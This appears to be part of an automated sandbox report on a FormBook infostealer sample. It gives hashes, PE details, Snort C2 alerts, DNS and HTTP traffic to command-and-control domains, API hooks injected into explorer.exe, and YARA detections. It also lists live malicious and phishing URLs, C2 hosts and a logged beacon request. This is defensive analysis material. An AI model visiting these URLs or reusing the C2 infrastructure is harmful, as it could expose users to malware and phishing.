                                      https://click.stitchfix.com/YXcr?pid=Email&sf_client_external_id=613c20e2-b0dd-4438-8a2e-0d1d1513fc57&deeplink=true&utm_campaign=email_us_w_reactivation_styleshuffle&utm_source=blueshift&utm_medium=email&utm_content=email_us_w_reactivation_styleshuffle_437152218&af_esp_url_path=%2Ftrack&af_esp_url_params=uid%3D32c44352-a594-48c3-bce6-586e60e061a2%26txnid%3Df1763a38-2e1d-5443-9ceb-d12aa1744af2%26bsft_aaid%3D3a8cb797-2e0c-489f-b330-8334bcfa0b57%26eid%3D7efc95f6-bd2a-acf5-0423-478fa777323c%26mid%3D530eddc0-b872-4a79-ac14-24461f2f973d%26bsft_ek%3D2022-09-21T14%3A24%3A38Z%26bsft_mime_type%3Dhtml%26bsft_link_id%3D17%26bsft_tv%3D62%26bsft_lx%3D9%26a%3Dclick%26api%3Dtrue&af_esp_name=blueshift&af_dp=https%3A%2F%2Fwww.stitchfix.com%2Fapp%2Fhome&af_web_dp=http://Maxprosouth.ezoneicon.com?e=Ym9AbWF4cHJvc291dGguY29tGet hashmaliciousUnknownBrowse
                                      • 104.16.123.96
                                      AutoDeployDownloader.exeGet hashmaliciousUnknownBrowse
                                      • 162.159.137.37
                                      SecureMsFile.htmlGet hashmaliciousHTMLPhisherBrowse
                                      • 104.18.43.158
                                      ATT00001.htmlGet hashmaliciousHTMLPhisherBrowse
                                      • 104.17.24.14
                                      https://casa.tiscali.it/promo/?u=https://theclickrescue.com/js/auth/sf_rand_string_lowercase/jim.schrage@canyons.eduGet hashmaliciousHTMLPhisherBrowse
                                      • 104.16.126.175
                                      https://4556.de/_V7TG_36Get hashmaliciousUnknownBrowse
                                      • 188.114.96.3
                                      https://www.rxjapan.jp/?wptouch_switch=desktop&redirect=https://activamark.com%2F%2F%2F%2F%2F%2F%2F%2F/verf/%2F%2F%2F%2F/sjhzfi%2F%2F%2F%2FdG9tLmtlbGx5QGNhbWJyaWRnZXNoaXJlLmdvdi51aw==Get hashmaliciousUnknownBrowse
                                      • 188.114.96.3
                                      https://www.yonseidentist.com/govuk5/index.phpGet hashmaliciousUnknownBrowse
                                      • 104.17.24.14
                                      TuesdayMarch2023RequestComplete.htm__Signed_Copy_8130205287423462.htmGet hashmaliciousHTMLPhisherBrowse
                                      • 104.17.25.14
                                      https://us02web.zoom.us/j/82555655717?pwd=Y2Y2ZzYyYURCMmY0c3JIcGUvWHpDQT09Get hashmaliciousUnknownBrowse
                                      • 172.64.144.98
                                      https://is.gd/ESDrU7Get hashmaliciousUnknownBrowse
                                      • 104.25.233.53
                                      AutoDeployDownloader.exeGet hashmaliciousUnknownBrowse
                                      • 162.159.137.37
                                      Documento_Recebido_2023132.055349.01706.lNk.lnkGet hashmaliciousUnknownBrowse
                                      • 172.67.206.33
                                      ThursdayMarch2023Request.shtmGet hashmaliciousHTMLPhisherBrowse
                                      • 104.17.25.14
                                      DHL_shipping_documents.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                      • 162.159.133.233
                                      [EXT](1) New Invoice Request.emlGet hashmaliciousHTMLPhisherBrowse
                                      • 104.21.84.223

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ClbrTLBbVA.exe.log

                                      Download File
                                      Process:C:\Users\user\Desktop\ClbrTLBbVA.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1314
                                      Entropy (8bit):5.350128552078965
                                      Encrypted:false
                                      SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                      MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                      SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                      SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                      SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                      Malicious:true
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                      C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                      Download File
                                      Process:C:\Windows\explorer.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):984
                                      Entropy (8bit):5.227423502376633
                                      Encrypted:false
                                      SSDEEP:24:Yq6CUXyhm5IUmtQlbNdB6hm5VUmtQlz0Jahm5SUmtQlHZ6T06Mhm5vUmtQlbxdB8:YqDUXycIwbNdUcpwz0JacWwHZ6T06Mcb
                                      MD5:D9512E54D33D06E68E0C0D36726F7776
                                      SHA1:2E2ED852C188E0F96FCF861D7B73B8C479379845
                                      SHA-256:C70B840F192B885EF63C8426B0667EF175424A96DEC79A988C9525AD8E6997D2
                                      SHA-512:AAFCD49F2C87D4D43076CB4C1357FFAC9AB224ADBD4CEB06961755A0D6305D550090DDA34CAAA3C9B2700EF182CC9D6000BAB87A1A31D15A6A9F7565F60BA515
                                      Malicious:false
                                      Preview:{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2360844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2350844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2340844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2330844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2320844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2310844864,"LastSwitchedHighPart":30747916,"PrePopulated":true}]}

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.291489679553607
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Windows Screen Saver (13104/52) 0.07%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      File name:ClbrTLBbVA.exe
                                      File size:758784
                                      MD5:441aa97af8ab929af47af76962584b02
                                      SHA1:19179b5b35112d35d1b3514f1026663efb86ef37
                                      SHA256:1c4a23543bd6562ebedfbc5905ff87a87d06d25a03b1015043314e00befa54dd
                                      SHA512:4681ede637ced2a9d7d997a296fe3c1e8c889e9f95cf9c56d32aea5aa7434eaa20f3648fa9347012bab3f15feb8d020a1e152c8cf0ec3b9d158c1d6aefd611ec
                                      SSDEEP:12288:TkB9yywVrLzwY3TQ4PDUUoUqSYvCeRz42p/7:TYwVL3TQ4lXq472h
                                      TLSH:C4F48D3C1BFC8556E039D7758BB04C20E7EDB5177636CE1E79EA01890A27A42768336E
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*%d..............P..f...,........... ........@.. ....................................@................................

                                      File Icon

                                      Icon Hash:8cb239695470acd4

                                      Static PE Info

                                      General

                                      Entrypoint:0x4b841a
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x64252A0C [Thu Mar 30 06:19:56 2023 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb83c80x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xba0000x28dc.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xb1eb40x54.text
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000xb64200xb6600False0.6937342036497601data7.289721058051092IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0xba0000x28dc0x2a00False0.9165736607142857data7.62473483572048IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0xbe0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountry
                                      RT_ICON0xba0c80x249cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                      RT_GROUP_ICON0xbc5740x14data
                                      RT_VERSION0xbc5980x340data

                                      Imports

                                      DLLImport
                                      mscoree.dll_CorExeMain

                                      Network Behavior

                                      Snort IDS Alerts

                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      192.168.2.315.197.142.17349699802031412 03/30/23-20:53:01.782313TCP2031412ET TROJAN FormBook CnC Checkin (GET)4969980192.168.2.315.197.142.173
                                      192.168.2.315.197.142.17349699802031453 03/30/23-20:53:01.782313TCP2031453ET TROJAN FormBook CnC Checkin (GET)4969980192.168.2.315.197.142.173
                                      192.168.2.315.197.142.17349699802031449 03/30/23-20:53:01.782313TCP2031449ET TROJAN FormBook CnC Checkin (GET)4969980192.168.2.315.197.142.173

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Mar 30, 2023 20:52:32.841531992 CEST4969880192.168.2.366.235.200.145
                                      Mar 30, 2023 20:52:32.858952045 CEST804969866.235.200.145192.168.2.3
                                      Mar 30, 2023 20:52:32.859565020 CEST4969880192.168.2.366.235.200.145
                                      Mar 30, 2023 20:52:32.859565020 CEST4969880192.168.2.366.235.200.145
                                      Mar 30, 2023 20:52:32.876929998 CEST804969866.235.200.145192.168.2.3
                                      Mar 30, 2023 20:52:33.053632975 CEST804969866.235.200.145192.168.2.3
                                      Mar 30, 2023 20:52:33.053666115 CEST804969866.235.200.145192.168.2.3
                                      Mar 30, 2023 20:52:33.053930998 CEST4969880192.168.2.366.235.200.145
                                      Mar 30, 2023 20:52:33.054528952 CEST804969866.235.200.145192.168.2.3
                                      Mar 30, 2023 20:52:33.054725885 CEST4969880192.168.2.366.235.200.145
                                      Mar 30, 2023 20:52:33.064307928 CEST4969880192.168.2.366.235.200.145

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Mar 30, 2023 20:52:32.680023909 CEST6270453192.168.2.38.8.8.8
                                      Mar 30, 2023 20:52:32.835279942 CEST53627048.8.8.8192.168.2.3
                                      Mar 30, 2023 20:53:01.710021973 CEST4997753192.168.2.38.8.8.8
                                      Mar 30, 2023 20:53:01.762501001 CEST53499778.8.8.8192.168.2.3

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Mar 30, 2023 20:52:32.680023909 CEST192.168.2.38.8.8.80x1191Standard query (0)www.adornmentwithadrienne.comA (IP address)IN (0x0001)false
                                      Mar 30, 2023 20:53:01.710021973 CEST192.168.2.38.8.8.80xfbb9Standard query (0)www.dafabetvn.infoA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Mar 30, 2023 20:52:32.835279942 CEST8.8.8.8192.168.2.30x1191No error (0)www.adornmentwithadrienne.comadornmentwithadrienne.comCNAME (Canonical name)IN (0x0001)false
                                      Mar 30, 2023 20:52:32.835279942 CEST8.8.8.8192.168.2.30x1191No error (0)adornmentwithadrienne.com66.235.200.145A (IP address)IN (0x0001)false
                                      Mar 30, 2023 20:53:01.762501001 CEST8.8.8.8192.168.2.30xfbb9No error (0)www.dafabetvn.infodafabetvn.infoCNAME (Canonical name)IN (0x0001)false
                                      Mar 30, 2023 20:53:01.762501001 CEST8.8.8.8192.168.2.30xfbb9No error (0)dafabetvn.info15.197.142.173A (IP address)IN (0x0001)false
                                      Mar 30, 2023 20:53:01.762501001 CEST8.8.8.8192.168.2.30xfbb9No error (0)dafabetvn.info3.33.152.147A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • www.adornmentwithadrienne.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.34969866.235.200.14580C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Mar 30, 2023 20:52:32.859565020 CEST103OUTGET /ne28/?yXB=JRhSHg+E0kVeMb5bWxBNKjX7GZb/Gd7gTaCbDgRTO6UaOuEkMa6xiN+s4LYpa+moX3ut&DR-Hl=f48d7hbXPvmPj HTTP/1.1
                                      Host: www.adornmentwithadrienne.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Mar 30, 2023 20:52:33.053632975 CEST104INHTTP/1.1 301 Moved Permanently
                                      Date: Thu, 30 Mar 2023 18:52:33 GMT
                                      Content-Type: text/html; charset=iso-8859-1
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Location: https://www.adornmentwithadrienne.com/ne28/?yXB=JRhSHg+E0kVeMb5bWxBNKjX7GZb/Gd7gTaCbDgRTO6UaOuEkMa6xiN+s4LYpa+moX3ut&DR-Hl=f48d7hbXPvmPj
                                      CF-Cache-Status: MISS
                                      Server: cloudflare
                                      CF-RAY: 7b028ce16955916e-FRA
                                      Data Raw: 31 35 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 64 6f 72 6e 6d 65 6e 74 77 69 74 68 61 64 72 69 65 6e 6e 65 2e 63 6f 6d 2f 6e 65 32 38 2f 3f 79 58 42 3d 4a 52 68 53 48 67 2b 45 30 6b 56 65 4d 62 35 62 57 78 42 4e 4b 6a 58 37 47 5a 62 2f 47 64 37 67 54 61 43 62 44 67 52 54 4f 36 55 61 4f 75 45 6b 4d 61 36 78 69 4e 2b 73 34 4c 59 70 61 2b 6d 6f 58 33 75 74 26 61 6d 70 3b 44 52 2d 48 6c 3d 66 34 38 64 37 68 62 58 50 76 6d 50 6a 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                      Data Ascii: 15c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.adornmentwithadrienne.com/ne28/?yXB=JRhSHg+E0kVeMb5bWxBNKjX7GZb/Gd7gTaCbDgRTO6UaOuEkMa6xiN+s4LYpa+moX3ut&amp;DR-Hl=f48d7hbXPvmPj">here</a>.</p></body></html>
                                      Mar 30, 2023 20:52:33.053666115 CEST104INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Code Manipulations

                                      User Modules

                                      Hook Summary

                                      Function NameHook TypeActive in Processes
                                      PeekMessageAINLINEexplorer.exe
                                      PeekMessageWINLINEexplorer.exe
                                      GetMessageWINLINEexplorer.exe
                                      GetMessageAINLINEexplorer.exe

                                      Processes

                                      Process: explorer.exe, Module: user32.dll
                                      Function NameHook TypeNew Data
                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE4
                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE4
                                      GetMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE4
                                      GetMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE4

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:20:50:46
                                      Start date:30/03/2023
                                      Path:C:\Users\user\Desktop\ClbrTLBbVA.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\ClbrTLBbVA.exe
                                      Imagebase:0x1d0000
                                      File size:758784 bytes
                                      MD5 hash:441AA97AF8AB929AF47AF76962584B02
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      General

                                      Target ID:10
                                      Start time:20:50:59
                                      Start date:30/03/2023
                                      Path:C:\Users\user\Desktop\ClbrTLBbVA.exe
                                      Wow64 process (32bit):false
                                      Commandline:{path}
                                      Imagebase:0x230000
                                      File size:758784 bytes
                                      MD5 hash:441AA97AF8AB929AF47AF76962584B02
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low

                                      General

                                      Target ID:11
                                      Start time:20:50:59
                                      Start date:30/03/2023
                                      Path:C:\Users\user\Desktop\ClbrTLBbVA.exe
                                      Wow64 process (32bit):true
                                      Commandline:{path}
                                      Imagebase:0xb70000
                                      File size:758784 bytes
                                      MD5 hash:441AA97AF8AB929AF47AF76962584B02
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000000B.00000002.345666736.00000000011BF000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:low

                                      General

                                      Target ID:12
                                      Start time:20:51:06
                                      Start date:30/03/2023
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Explorer.EXE
                                      Imagebase:0x7ff69fe90000
                                      File size:3933184 bytes
                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Target ID:13
                                      Start time:20:51:18
                                      Start date:30/03/2023
                                      Path:C:\Windows\SysWOW64\colorcpl.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                      Imagebase:0x1210000
                                      File size:86528 bytes
                                      MD5 hash:746F3B5E7652EA0766BA10414D317981
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
